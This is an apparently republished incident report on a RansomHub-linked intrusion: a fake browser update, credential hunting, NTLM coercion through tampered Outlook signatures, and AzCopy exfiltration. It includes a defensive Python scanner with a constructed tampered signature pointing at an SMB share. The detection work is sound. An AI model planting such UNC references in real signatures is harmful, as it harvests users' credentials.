Varonis recently helped a customer who observed a spike in CPU activity on a server; the investigation uncovered an advanced threat actor affiliated with the RansomHub group. The team worked closely with the customer to investigate and remediate the threat before ransomware could be deployed.
The incident started when a user downloaded what they believed was a legitimate browser update, but it was actually a malicious JavaScript payload. This led to a chain of automated reconnaissance activities, including enumerating Active Directory users and computers, querying local system information, and hunting for credentials in memory.
As part of the investigation, Varonis’s team wrote an unpacking routine for the specific malware variant used in the attack, allowing them to retrieve the final payload in plaintext. The final payload was a SOCKS proxy designed to relay traffic between attacker endpoints and internal network infrastructure.
The threat actor manipulated email signatures stored at %env:APPDATA\Microsoft\Signatures, which, on vulnerable clients, could be used to coerce an NTLM authentication attempt and harvest additional credentials.
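A defender-side check for the signature tampering described above, added here as an example and not taken from the incident write-up: it scans Outlook signature files for src/href values that point at a UNC path or a file:// URL, the kind of reference a client may try to fetch and, in doing so, send an NTLM authentication to the named host. The sample signatures, the host 10.0.0.5 and the share names are constructed.

```python
import os
import re
from pathlib import Path

# Constructed sample signatures (not from the incident). "Tampered.htm" references
# an SMB share and a file:// URL; a client rendering it may try to fetch those
# resources and authenticate with NTLM to the host named in the path.
SAMPLE_SIGNATURES = {
    "Clean.htm": '<p>Jane Doe</p><img src="cid:logo.png">',
    "Tampered.htm": ('<p>Jane Doe</p><img src="\\\\10.0.0.5\\share\\logo.png">'
                     '<a href="file://srv01/docs">docs</a>'),
}

# src/href values that resolve over SMB: UNC paths (\\host\share\...) or file:// URLs.
SMB_REFERENCE = re.compile(
    r'(?:src|href)\s*=\s*["\']?(\\\\[^"\'\s>]+|file://[^"\'\s>]+)', re.IGNORECASE
)


def find_smb_references(html: str) -> list[str]:
    """Return every src/href value in a signature that would be fetched over SMB."""
    return SMB_REFERENCE.findall(html)


def audit_signatures(signatures: dict[str, str]) -> dict[str, list[str]]:
    """Map file name -> suspicious references, keeping only files that have any."""
    return {name: refs for name, html in signatures.items()
            if (refs := find_smb_references(html))}


def load_signature_dir(path: Path) -> dict[str, str]:
    """Read every .htm/.html file under path (the per-user Outlook Signatures folder)."""
    return {f.name: f.read_text(errors="ignore") for f in sorted(path.rglob("*.htm*"))}


if __name__ == "__main__":
    # Scan the live signature folder when present; otherwise run on the samples.
    sig_dir = Path(os.environ.get("APPDATA", "")) / "Microsoft" / "Signatures"
    targets = load_signature_dir(sig_dir) if sig_dir.is_dir() else SAMPLE_SIGNATURES
    for name, refs in audit_signatures(targets).items():
        print(f"{name}: {', '.join(refs)}")
```

Run against a collected copy of the Signatures folder from a suspect host; any hit is worth comparing with the user's known signature content and with SMB/NTLM authentication logs for the referenced host.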
After gaining privileges, the attacker began hunting for credentials and privilege escalation opportunities in the customer’s network. They scanned network shares for credential-containing material, identified credentials stored in browsers, and abused Domain Admin accounts.
The threat actor also abused registry settings and Microsoft Office utilities to open files of interest describing the client’s internal architecture, networking, and server environments. Eventually, they deployed AzCopy, a Microsoft utility for interacting with Azure Storage Accounts, to achieve mass data exfiltration from the targeted directories.
Varonis’s intervention services helped the customer eradicate the threat with zero business downtime. The incident highlights the need for timely detection and response to prevent ransomware attacks.
Source: https://www.bleepingcomputer.com/news/security/how-a-cpu-spike-led-to-uncovering-a-ransomhub-ransomware-attack